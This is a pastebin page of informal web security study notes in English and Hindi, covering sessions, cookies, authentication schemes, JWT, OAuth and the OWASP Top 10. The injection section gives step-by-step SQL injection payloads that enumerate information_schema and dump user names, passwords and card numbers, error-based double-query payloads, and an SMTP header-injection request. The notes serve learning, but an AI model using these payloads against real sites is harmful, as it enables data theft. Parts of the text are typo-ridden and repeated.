· 6 years ago · Mar 18, 2020, 06:24 AM
1notes
2
3session managemnt :
4
5example add to cart kara hai toh hamesha connection stateful rakata
6
7a web sesiion is a sequence of netwrok http request and response stranscatrion associated to some user
8
9a session is a semi permanent interactable interchange it can be set up at soome point of time and dropped or torned down at some point time (session store hota hai server pe )
10
11session is typically not always stateful that means that atleast one of the two parties need to save information about system history inorder to communicate..
12
13a website may start a session when a user visits the site for the first time from that point of onwards everything/anythinf the user does is done within the context of established session
14
15at some point the user may decide to authenticate extra functionality once finished he will logout finally choosing to terminate the session altogether ..
16
17where is the session id stored and how is it saved ???
18
19
20cookie jar , local storge or memory ,
21
22the http protocol is stateless so to handle sessions we need to smuggle some state into the protocol. usually it is added as a header or cokkie and the session may have some data associated with it which needs to be stored by one of the parties....
23
24there are two types of session id tokens :
25
261, obaque (khali hogi):
272. self-describing :
28
29
30
31the token given to the user maybe obque or self describing and obaque token in itself holds no information it is only used as a key to fetch essential data server side
32
33_________________________
34type:obaque
35Sample
36
37DATA:
38
39______________________________
40type :self-describing |
41sample : |
42 |
43data : exp:120 |user id 3 |
44_______________________________
45
46on the other hand the self describiong session id is just what its name suggest it holds the data within the
47
48Obaque is a random token with enough entropy to avoid bruteforce attack while self describing is base64 encoded and signed to protect its integrity building on the idea of self describing token we can contruct a so called stateless session
49
50
51HTTP cokkie
52
53an http cookie is a small piece of data that the user sends to the browser may store it and send it back to the same server in the next request typically it is used to tell weather the same request came from the same browser..
54
55
56Preferences : it remembers stateful information for the stateless http protocol cookies are used for three purposes:
57
581.session management, personalisation and tracking
59
60session management : login, shopping carts, games score, or anything else the server should remember
61
62
632.personalisation : user preference themes,
64
653.Tracking : recording and analyzing behaviour cambridge analytica
66
67
68creating cookies : when
69
70
71
72document.cookie = "username "
73
74
75
76when recieving an http rwquest the server can send a Set-Cookie header with response the cookie is usally stored by the browser and then the cokkies is sent with the request inside the cookie http header and expiration date or duration can be specified after which the cookie is no longer sent....
77
78additionally restricting to a specific domain can be set and path to where the cookie is sent
79
80Set-Cookie http response header sends cookies from the server to the user agent
81
82set-cookie: tasty_cookie=strawbeery
83
84Cookie-Prefix:
85
86
87HTTP/2.0 200 OK
88Content-Type: text/html
89Set-Cookie: yum=heelo;
90Set-COokie: hello=yum;
91
92
93
94Session-Cookie: :
95
96
97GET /sample_page,html HTTP/2.0
98host: www.example.org
99Cookie: yummy_cookie=choco; tast_cookie=starwbeery;
100
101
102the cookie created above is a session cookie. it is deleted when the client shut downs because it didnt spcify an expires or max-age drirectives However web browsewr may use seesion restoring, which makes most session cookies permanent as if the browser was never closed
103
104
105Permanent-cookies: Instead of expiring when the client closes permananent cookies expire at a specific date or after specific lenght of time
106
107Set-Cookie: id=a3wal Expires=WED, 21 OCt 2015
108
109
110secure& http only cookie: secure http only
111
112
113secure cookie is only sent to the server within an encrytped request over an https protocol even with secure directive senstitive information should never be stored in cookies as they are inherantily unsecure and cant provide any real protection
114
115
116to help mitigate xss attack http only cookies are inaccessible to help xss javascript document cookie api
117
118
119they are send to the server
120
121for ex cookies that persisit server side sessions dont need to be avaialbe to the javascript and the http only flag should be set
122
123
124Scope of cookies:
125
126the domain of the path directories define the scope of cookie: what url the cookies should be sent to
127
128Domains specifies allowed host to recieve the cookies if unspecified it defaults to the host of the current document location
129
130excluding subdomains if the domain is specified then sub domains are always included
131
132Attack : allow ACO // on this
133
134example : if Domain=mozilla.org is set than cookies are sent to mozzila .org and sub domains
135
136
137PATH: indicates a url path that must exist in the requested url in order to send cookie header
138
139for ex. %x2f (/) character is considered a directory and sub directory will match as well
140
141
142/doscs
143/doscsa/web
144/doscs/web/http
145
146same-site cookies : lets server requires that cookie shoudnt be sent with cross-site request which provides some protection against csrf attack
147
148same-site attribute can have 3 values : none , lacks, strict
149
150
151none : the browser will sewnd with both cross site and same site request
152strict: the browser will only send cookies for same site request (requests originating from the side set the cookie) if the request originated from different url than the url of the current location none of the cookies with the strict attribute will not be included
153
154lacks : same site cookies are withheld on cross site sub request
155
156example : calls to load images or frames but will be sent when a user naviagtes to url from the external site following a link
157
158
159browser are migrating to cookies to samesite : lacks
160
161
162
163if the cookie is needed to be sent cross origin opt out of the same site restriction using the none directive and none is used along with secure attribute
164
165
166//cookie-prefixes: the design of the cookie mechanism is such that a server is unable is to confirm a cookie was set on a secure origin or not tell weather a cookie was origanly set
167
168
169
170Two headers
171
172HOST
173
174SECURE
175
176
177if a cookie have name this prefix Host_ - it will be only be accepted in a set cookie directives if its marked secure
178
179_secure - if a cookie has directivies if its marked secure it orignated from a secure origin... , does not include a domain attribute and has path attribute to /. in this way these cookies can be seen as domain locked
180
181
182
183
184(session vs cookie )
185
186session: can store any type of data becoz the value of data type of object (object data type)
187
188sessions are stored on server it is secure as they are stored in binary / encrypted form and gets decrypted at the server session is independent for every client it is indiviual for evert client. there is no limitation on the size or the number of the session to be used in an application we can not disable the sessions, sessions can be used without cookies. the disadvantage of session is that it is an burden or overhead on the server
189
190sessions are called as non persistent cookies becoz its life time can be set manually
191
192Cookies : can only store string data types, they are stored at client side cookies is non secure since stored in text format at client side cookie may or maynot be indiviual client ..
193
194size of cookie is limited to 40 and no of cookies is restricted to 20
195
196cookies can be disabled since the value is string format there is no security we have persisitent and non persistent cookies
197
198authentication equals to confirming your own identity
199
200authorization being allowed access to the system/resource
201
202
203types
204
2051.http basic authentication
2062.form based authentication
2073 http digest access authentication
2084. bearer authentication
2095. http origin bound authentication
210
211
212cookie make the http stateful
213
214
215
216Authentication
217
218verifies who you are who you say you are
219
220methods
221
222a) login forms
223b) http authentication
224c) http digest
225d) x.509 certifcates
226e) custom authentication method
227
228Authorization
229
230
231decides if you have permissin to access a resouce
232
233methods
234a)access controls for urls
235b)secire objects and methods
236c)access control list
237
2381.http basic authentication
2392.form based authentication
2403 http digest access authentication
2414.bearer authentication
2425.http origin bound authentication
2436.mutual authentication
244
245
246its theory how can you get practical use
247
248when you are pentesting a website you can know which types of authentication is using
249
250
251http basic authentication it is the simple technique which involvesenforcing access controls to
252web resources it uses standard feels in the http header, removing the needs for the handshake and does no require cookies ,session identifiers
253
254with basic authentication you can store password on the server in with whatever encryption method you want this is a developers perspective. it sends usernames and passwords over the internet that is base64 encoded
255
256if transmission is intercepted than information can easily be decoded
257
258
259form based authentication
260
261allows developers to control look and feel of the login authentication screens by customizing login screen and error pages that an http browser presents to the user. content is sent in plaintext just like basic authentication this can expose usernames and passwords unless we can secure the connection with ssl.
262
2634 steps :-
264
2651. client request access to a productive resource
266
2672. if the client is unauthenticated than the server redirects the user to the login page
268
2693. the client submits the login form to the server
270
2714. the server attempts to authenticate the user
272
273Bearer based authentication
274
275is a token based system used in o-auth 2.0 productive resource. A bearer authentication is a random string used in only by the server that can either be a short string of hexa decimal characters or more structure token such as json web token aka jwt
276____________________________________________________
277http digest authentication :
278
279digest access authentication uses md5 hashes/hasing to ensure that no username/usernames or passwords , http methods or requested uri in plain text though digest authentication uses encryption it is still vulnerable to man in the middle attack
280
281// homework : md5 hashing kese unsecure hai paddo
282
283
284Process :
285
286step 1: clients send a request to a server
287
288step 2: the server responds with a special code called nonce(number used in usually onces)and another string representing the realm or the hash and asks client to authenticate
289
290step 3: the client responds with nonce and an encrypted version of the username password of the realm or hash
291
292step 4: the server responds to the request and gives the requested information if the client hashes matches the thier own username password of hash or realm
293__________________________________________
294HOBA - http origin bound authentication
295
296is a digital signature based design of http authentication that used javascript based authentication that is embedded in html
297
298// binance.com -- aap jab username password daloge voh encrypted form me hoga
299
300it is alternative to http authentication scheme that require passwords by using digtial signatures as an authentication mechanism the client creates a new public private key pair for each host it authenticates the keys are used in hoba for http clients to authenticate themselves to servers in http protocol in a javascript authentication program the keys are not stored in public key certificates but instead in subject Public Key Info Structure (PKIX ka part hai rfc 5280)
301__________________________________
302
303
304 mutual authentication is a process/technology where both entities authenticates each other
305
306 for Example : The client authenticates the server and vice versa by exchange of certificates
307
308
309rfc 7519 - jwt tokens
310
311session based authenticatoon :
312
313
314Browser SERVEr
315
316 POST/user/login body(username,pw)
317__________________________________________________________________________________________________________>________
318
319 Sends cookies to browser(session id)
320__________________________________________________________________________________________________________<________
321
322 sends auth req with cookie (session id)
323__________________________________________________________________________________________________________>________
324
325 sends response
326__________________________________________________________________________________________________________<________
327
328
329
330Browser SERVEr
331
332 POST/user/login body(username,pw)
333__________________________________________________________________________________________________________>________ create JWt with secret
334
335 Sends JWT to browser
336__________________________________________________________________________________________________________<________
337
338 sends auth req with jwt in header jwt se header nikal liya
339__________________________________________________________________________________________________________>________ check jwt signature get user info
340
341 sends response from jwt
342__________________________________________________________________________________________________________<________
343
344
345
346
347
348**session vs token based authentication:
349------------------------------------------------
350
351http stateless however there are sometimes where the server would need to remember the state
352
353FOR example : in an online shop after we put a product in our shopping cart, we dont want our product to disappear when we go to another page to buy another product i.e. we want our purchase to be rembered while we browse arounf the online shop
354
355session based authentication : in session based authentication the server will create a session for the user after the users logs in
356
357the session id is then stored on a cookie on the users browser while the users stay logged in "the cookie would be send along every subsequent request"
358
359last time than the server can than compare the session id stored on the cookie against the session information stored in memory (Server) to verify users identity and sends response with the corresponding state
360
361{diagram jo phele bana chuke ho paper me aaega 200%}
362
363Token based authentication : many web application uses jwt tokens instead of session for authentication in token based application the server creates jwt with a secret and sends the jwt to client, the client stores the jwt token (usually in local storage) and includes jwt in the header with every request
364
365the server would than validate jwt with every request from the client and would send the response
366
367
368(diagram number 2 jwt vala_)
369
370
371the Crux: the biggest difference here is that the users state is not stored on the server as the state is stored inside the token on the client side
372
373most of the modern web applications use jwt for authentication (for reasons including scabality and mobile device authentication )
374
375json web token library isse create kar sakte ho
376
377express jwt isse validate kar sakte ho
378
379
380scalabilty :
381
382session based authentication token based authentication
383
384becoz are stored in servers memory scaling becomes an issue | no issue with the scaling as the token is stored on the client side
385when there are large of user using the server at once |
386
387
388Multiple device :
389
390cookies normally work on one single domain or a sub domain | there is no issue with cookies as jwt token is included in the req
391they are normally disabled by the browser if they work cross domain | header
392(third party cookies)
393 |
394it posses issues when api are served from a different domain to mobile |
395and web devices |
396
397-------------------------------------------------------------------------------------------------------------------------------------------------------
398
399token based authentication using jwt is more recommended method in modern web applications one drawback with jwt is that the size of jwt is much bigger comparing with session id stored in cookie becoz jwt contains more user information
400
401care must be taken to ensure only the neccessary information is included in jwt and senstitive information should be omitted
402
403
404JWT tokens
405________________
406
407it is an open standard (rfc 7519)
408
409it is used to securly tranfer informatiion bw two bodies
410
411it is digiatally signed (means info is digitally signed and trused and no one can alter data)
412
413it is comapact jwt tokens can be sent via url post request http header
414
415it is fast
416
417it is self contained token (means token itslef contains info about the user )
418
419it is used for authentication
420
421
422what does it look like
423
424aaaaaaa.bbbbbbbbb.cccc
425
426aaaaaa represents header
427
428bbbbbb reperesnts payload
429
430ccccccc represents signature
431
432
433header is base64 encoded to make the first part
434
435the header contains the algorithm and the token type
436
437header
438
439{
440 "alg" : "sha256"
441 "typ" : "JWT"
442}
443
444
445payload
446
447{
448 "sub" : "123213213",
449 "name": "johnfoe",
450 "iat" : 1232132132132
451
452}
453
454it contains user data meta data like expiry date of the token user is admin or not
455
456the payload is base 64 encoded to form the second part
457
458
459Signature
460
461
462we are able to convey the defination of the token and how is it going to pass
463
464it also ensures that the data doesnt cahnge during transmission form one bosy to another body
465
466HMACSHA256(
467
468 base64urlencode(header)+ "."+
469 base64urlEncode(payload),
470 your-256-bit-secret
471
472)
473
474owasp top 10 2017
475-------------------------------------
476
477
478sql injection first step : break the query by finding the input parameter
479
480step 2 : fuzzing get an error
481
482step 3: see if you are able to see backend error on frontend you can get relevant data out by sending in sql queries
483
484step 4 : to find out number of columns using order by hame yeh isliye chaiye hota hai jisse ki union select chal jae
485
486step 5 : find out vulnerable parameters aur vo dikte issliye hain kyunki unhi ka data frontend pe dikta hai
487
488
489table_name , khatam hone ke bad numbers from information_schema.tables
490
491table_name , khatam hone ke bad numbers from information_schema.columns where table_name = 'users'
492
493
494
495
496group_concat(uname,":",pass,":", cc) , khatam hone ke bad numbers from users
497
498
499smtp injection aka mail header injection
500
501
502Name=MAayank&email=mayank.betch18@gmailcom&bcc=attacker@gmial.com&remarks=kya+haal+hai+ben&form=sumbit
503
504
505error based
506
507
508select rand() bw 0 and 1 but not 0 and 1 example 0.343432432
509
510floor deta hai chota number round off karke
511
512ceiling deta hai bada number round off karke
513
514select floor (rand()*2)
515
516select floor (rand()*2)tiltlename_if_you_want
517
518
519select table_name from information_schema.tables
520
521
522select version() from information_schema.tables
523--------------------
524double query
525------------------------
526
527select database() single query
528
529select (select database())
530
531jyunki jo hum bracket me likhte hai usse ek alag entity treat karte hain
532
533
534select concat(0x3a,0x3a,(select database()),0x3a,0x3a) from information_schema.tables
535
536
537select concat(0x3a,0x3a,(select database()),0x3a,0x3a, floor (rand()*2)) from information_schema.tables
538
539
540select count(*), concat(0x3a,0x3a,(select database()),0x3a,0x3a, floor (rand()*2))a from information_schema.tables group by a
541
542
543----------------------------------------------------------------------------------
544harshit sir notes
545------------------------
546
547owasp top 10 2017
548--------------------
549
550A1:2017-Injection
551
552Injection flaws, such as SQL, NoSQL, OS, and LDAP injection, occur when untrusted data is sent to an interpreter as part of a command or query. The attacker’s hostile data can trick the interpreter into executing unintended commands or accessing data without proper authorization.
553
554A2:2017-Broken Authentication
555
556Application functions related to authentication and session management are often implemented incorrectly, allowing attackers to compromise passwords, keys, or session tokens, or to exploit other implementation flaws to assume other users’ identities temporarily or permanently.
557
558A3:2017-Sensitive Data Exposure
559
560Many web applications and APIs do not properly protect sensitive data, such as financial, healthcare, and PII. Attackers may steal or modify such weakly protected data to conduct credit card fraud, identity theft, or other crimes. Sensitive data may be compromised without extra protection, such as encryption at rest or in transit, and requires special precautions when exchanged with the browser.
561
562A4:2017-XML External Entities (XXE)
563
564Many older or poorly configured XML processors evaluate external entity references within XML documents. External entities can be used to disclose internal files using the file URI handler, internal file shares, internal port scanning, remote code execution, and denial of service attacks.
565
566A5:2017-Broken Access Control
567
568Restrictions on what authenticated users are allowed to do are often not properly enforced. Attackers can exploit these flaws to access unauthorized functionality and/or data, such as access other users’ accounts, view sensitive files, modify other users’ data, change access rights, etc.
569
570A6:2017-Security Misconfiguration
571
572
573Security misconfiguration is the most commonly seen issue. This is commonly a result of insecure default configurations, incomplete or ad hoc configurations, open cloud storage, misconfigured HTTP headers, and verbose error messages containing sensitive information. Not only must all operating systems, frameworks, libraries, and applications be securely configured, but they must be patched/upgraded in a timely fashion.
574
575A7:2017-Cross-Site Scripting (XSS)
576
577XSS flaws occur whenever an application includes untrusted data in a new web page without proper validation or escaping, or updates an existing web page with user-supplied data using a browser API that can create HTML or JavaScript. XSS allows attackers to execute scripts in the victim’s browser which can hijack user sessions, deface web sites, or redirect the user to malicious sites.
578
579A8:2017-Insecure Deserialization
580
581Insecure deserialization often leads to remote code execution. Even if deserialization flaws do not result in remote code execution, they can be used to perform attacks, including replay attacks, injection attacks, and privilege escalation attacks.
582
583A9:2017-Using Components with Known Vulnerabilities
584
585A1:2017-Injection
586
587Injection flaws, such as SQL, NoSQL, OS, and LDAP injection, occur when untrusted data is sent to an interpreter as part of a command or query. The attacker’s hostile data can trick the interpreter into executing unintended commands or accessing data without proper authorization.
588A2:2017-Broken Authentication
589
590Application functions related to authentication and session management are often implemented incorrectly, allowing attackers to compromise passwords, keys, or session tokens, or to exploit other implementation flaws to assume other users’ identities temporarily or permanently.
591A3:2017-Sensitive Data Exposure
592
593Many web applications and APIs do not properly protect sensitive data, such as financial, healthcare, and PII. Attackers may steal or modify such weakly protected data to conduct credit card fraud, identity theft, or other crimes. Sensitive data may be compromised without extra protection, such as encryption at rest or in transit, and requires special precautions when exchanged with the browser.
594A4:2017-XML External Entities (XXE)
595
596Many older or poorly configured XML processors evaluate external entity references within XML documents. External entities can be used to disclose internal files using the file URI handler, internal file shares, internal port scanning, remote code execution, and denial of service attacks.
597A5:2017-Broken Access Control
598
599Restrictions on what authenticated users are allowed to do are often not properly enforced. Attackers can exploit these flaws to access unauthorized functionality and/or data, such as access other users’ accounts, view sensitive files, modify other users’ data, change access rights, etc.
600A6:2017-Security Misconfiguration
601
602Security misconfiguration is the most commonly seen issue. This is commonly a result of insecure default configurations, incomplete or ad hoc configurations, open cloud storage, misconfigured HTTP headers, and verbose error messages containing sensitive information. Not only must all operating systems, frameworks, libraries, and applications be securely configured, but they must be patched/upgraded in a timely fashion.
603A7:2017-Cross-Site Scripting (XSS)
604
605XSS flaws occur whenever an application includes untrusted data in a new web page without proper validation or escaping, or updates an existing web page with user-supplied data using a browser API that can create HTML or JavaScript. XSS allows attackers to execute scripts in the victim’s browser which can hijack user sessions, deface web sites, or redirect the user to malicious sites.
606A8:2017-Insecure Deserialization
607
608Insecure deserialization often leads to remote code execution. Even if deserialization flaws do not result in remote code execution, they can be used to perform attacks, including replay attacks, injection attacks, and privilege escalation attacks.
609A9:2017-Using Components with Known Vulnerabilities
610
611Components, such as libraries, frameworks, and other software modules, run with the same privileges as the application. If a vulnerable component is exploited, such an attack can facilitate serious data loss or server takeover. Applications and APIs using components with known vulnerabilities may undermine application defenses and enable various attacks and impacts.
612
613A10:2017-Insufficient Logging&Monitoring
614
615Insufficient logging and monitoring, coupled with missing or ineffective integration with incident response, allows attackers to further attack systems, maintain persistence, pivot to more systems, and tamper, extract, or destroy data. Most breach studies show time to detect a breach is over 200 days, typically detected by external parties rather than internal processes or monitoring.Components, such as libraries, frameworks, and other software modules, run with the same privileges as the application. If a vulnerable component is exploited, such an attack can facilitate serious data loss or server takeover. Applications and APIs using components with known vulnerabilities may undermine application defenses and enable various attacks and impacts.
616
617A10:2017-Insufficient Logging&Monitoring
618
619Insufficient logging and monitoring, coupled with missing or ineffective integration with incident response, allows attackers to further attack systems, maintain persistence, pivot to more systems, and tamper, extract, or destroy data. Most breach studies show time to detect a breach is over 200 days, typically detected by external parties rather than internal processes or monitoring.
620
621
622
623--------------------------------------------------------------------------------------------------------------------------------------------------------
624
625 INJECTIONS
626
627 OS COMMAND INJECTION
628
629 SQL INJECTION
630
631 SMTP INJECTION
632
633 XPATH INJECTION
634
635 SSI INJECTION (SERVER SIDE INCLUDES)
636
637 HTML INJECTION
638
639 LDAP
640
641AUTHENTICATIOM CONTROLS
642
643* AUTHENTICATION BYPASS THROUGH RESPONSE TAMPERING
644
645* EXECUTION AFTER REDIRECT (EAR)
646
647* OTP RETURNED IN RESPONSE
648
649* THROUGH RESPONSE MODIFICATION
650
651* OTP COLLISON ATTACK
652
653* LACK OF OTP BINDING WITH USER ID
654
655* LACK OF OTP BRUTEFORCE PREVENTION
656
657* LACK OF PASSWORD BRUTEFORCE PREVENTION
658
659* LACK OF PASSWORD BRUTEFORCE PREVENTION
660
661* MISSING TWO FACTOR AUTHENTICATION FOR PAYMENTS
662
663* MISSING FORCED AUTHENTICATION
664
665
666
667OAUTH is an open standard authorization framework for token based authorization on the internet
668
669oauth which is pronounced as oh auth enables an end user account information to be used by thirty services such as facebook and google without exposing user credentials to the third party
670
671it acts as an intermediary on the behalf of the end user providing the third party with an access token that authorizes specific account of information to be shared
672
673the process for obtaining is called as authorization flow
674
675o auth 1.0 was first released in 2007 for twitter api
676
677in 2010 the ietf internet engineering task force is me group tha jiska nam oauth group which firsted set the first draft of oauth 2.0
678
679o auth 2.0 had a new authorization code flow to accomadate mobile applications simplified signatures short lived tokens with long lived authorization
680
681
682
683HOW DOES O-AUTH 2.0 WORK ???????????????????
684
685 its a six step process
686
687 1. the calender creation applocation requests authorozation to caccess protected resources in this case image files owned by the user by directing the user to authorize endpoint
688
689 2. the resource owner authenticates and authorizes the resouce access request from the application and the authorize endpoint returns an authorization grant to the client the o auth 2.0 protocol defines4 types of grants : authorization code client credentials device code and refresh token
690
691 3. the client then requests an access token from the authorization server by presenting the authorization grant returned from the authorize endpoint along with authentication of its own identity
692
693 4. if the client identity is authenticated and the authorization grant is valid the authorization server or authentication provider -- google authorization server in this instance will issue an access token to the client
694
695 5. the client can now request the protected resources from the resource server -- google drive in this example by presenting the access token for authentication
696
697 6. if the access token is valid the resourcae server returns the requested resources to the calender creation application (client )untrusted adata iss sent to an interpereter as pasrt of comm
698
699 INJECTIONS:
700
701 injection flaw such as sql, nosql,os ,and ldap injection occur whrn untrusted adata iss sent to an interpereter as pasrt of command or query the attackers hostile adata can trick the intereprerter into executing unintented commnands ot accessing data without proper authorization
702
703
704 injection vulnerabilites occur when a hacker is able to inject malicious queries or sscripts or commands into some interpreter or some input parameter of the website and is able to get some juicy data or sensitive data in return
705
706
707 OS COMMAND INJECTION - it is an attack in which the goal is execution of arbitatary commands on the host os via a vulnerable application. command injection attacks are possible when an application passes unsafe user supplied data (forms,cookies,http-headers, system-cell). ek input parmater hoga aur commond shell se interact kar rha toh logical operations use karke pata chalega
708
709 SQL INJECTION - union sql injection, error based double query injection, blind ( time , boolean ) is a code injection technique used to attack data-driven applications, in which malicious sql statements are inserted into an entry field for execution. sql injection is an attack where a hacker is able to inject malicious sql queries from the fronted of the website and get juicy data from the backed
710
711 SMTP INJECTION vulnerabilities arise when user input is placed into email address without adequate santization allowing an attacker to inject additional headers wiht arbitary values this behaviour can be exploited to send copies of emails to third parties, attach viruses.etc
712
713 XPATH INJECTION is an attack technique used to exploit applications that constructs XPATH queries form user-supplied input to query or navigate XML documents it can be used directly by an application to query an XML documnent as part of a larger operation such as applying an XSLY transformation to an XML document or applying an XQuery to an XML document the syntax of XPATH bears some reseamblance to an sql query and indedd it is possible to form sql like queries on an xml document usjng X-PATH
714
715 SSI INJECTION (SERVER SIDE INCLUDES)
716
717 HTML INJECTION is an attack that is similar to cross site scripting, while in the xss vulnerability the attacker can inject and execute javascript code the hyml injectiuon attack only allows the inkectuon of certain html tags when an application does not properly handle user supplied data an attacker can supply valid html code typicaaly via a parameter value and inkect their own content to the page this attack is typically used in conjunction with some form of social enginerring, as the attack is exploiting a code-based vulnerabilty and a users trust .
718
719
720Remediation html injection : script should filter meta characters from users input
721
722 LDAP injection
723
724 -------------------------------------------------------------------------
725
726 Broken authentication & session management
727
728 application functions related to authentication and session management are often implemented incorrectly allowing attackes to compromise passwords keys. or session tokens or to exploit other implementation flaws to assime other users indentities temp or permanently
729
730 in broken authentication & session management hackers make an attempt to steal account from another users, attackers/hackers uses leak and flaws in the authentication or session managemnt functions
731
732 why this attack occurs
733 credentials can be guessed or overwritten through weak managemtn functions eg (hacker is able to guess session id or change password)
734
735 session ids are exposed in the url
736
737 session ids dont time out
738
739 and much more
740
741
742 Authentication controls
743
744*AUTHENTICATION BYPASS THROUGH RESPONSE TAMPERING : an attacker can exploit this vulnerabilty in the application to bypass authentication and get access to post login modules . if the application is sending authentication success criteria in the responses it can be manipulated by an attacker to get authenticated . if request to the header are validating to "refferer header" it might be possible to add referrer header in post-login modules(requesting manually to get authenticated). if the application relies on the existence or the values of cookies when performing security critical operations but it does not properly ensure that the setting is valid for the associated user it is possible to bypass authentication
745
746
747* EXECUTION AFTER REDIRECT (EAR) : in this type of attack the web app sends a redirect to another location but instead of exitting out it executes additional code. this enables an attacker to ignore redirects and recieve senstive content intended for authenticated users. for example on entering wrong credentials the application gives a 302 redirect back to the login but also includes the users dashboard in the response which would then enable the attacker to attack victim dashboard.
748
749* OTP RETURNED IN RESPONSE : applications implement two factor authentication system such as otp to enhance the strength of the authentication process an otp system will be considered insecure if an attacker is able to obtain the otp in an inconspicious way thereby gaining access to the functionality being protected. this can be done in following way: the otp is being returned in the response body which is sent in reply to the otp trigger request.the otp is not user bound where in any otp generated by the application would work for any user.the otp functionality has a front-end validation which can be bypassed using the proxy tool. the otp functionality is vulnerable to collison attacks where a single otp is generated for 2 different users who generated or fired the request at same time. the otp does not expire after a period. the otp does not terminate after the first use that is one top can be used and is validated by the user.
750
751* THROUGH RESPONSE MODIFICATION : the otp functionality has frontend validation which can be bypassed using a proxy tool an attacker can byapss authentication by modifying reponse and overcoming otp functionality.
752
753* OTP COLLISON ATTACK :
754
755* LACK OF OTP BINDING WITH USER ID : lack of otp binding with user id the otp is not user bound where any otp generated by the application would work for any user this would enable an attacker to create an otp for themselves and take over any user account.
756
757* LACK OF OTP BRUTEFORCE PREVENTION : the bruteforce attack is an attempt to discover a value by systematically trying every value of numbers, letters and symbols until the one correct combination that works is found. these attacks are usually carried out by utilsing widely avaiable tools that include smart rules, wordlist and automatically guess value in this case the otp functionality has not implemented "any mechanism to prevent a bruteforce " an attacker can leverage this response to bruteforce the victim the ease of carrying out the attack depends upon the length and the complexity of the otp being generated by the application server
758
759
760* LACK OF PASSWORD BRUTEFORCE PREVENTION : in this case the application has not implemented an attacker can launch this attack to bruteforce the password of the victim the ease of carrying out the attack depends upon the length and complexity of the password being allowed by the password
761
762* MISSING TWO FACTOR AUTHENTICATION FOR PAYMENTS : 2 factor authentication is required which deals with financial transactions and the applications that are accessed from the insecure network ki bank ke credentials leak hoiage hain aur agar otp functionality nahi hai toh lag laye
763
764* MISSING FORCED AUTHENTICATION : the web application does not restrict access to non public resources of the application through authentication mechanisms based on excess privileage policy therefore an attacker will be able to excess the internal senstitive pages of the application without logging in application which ideally should be available using login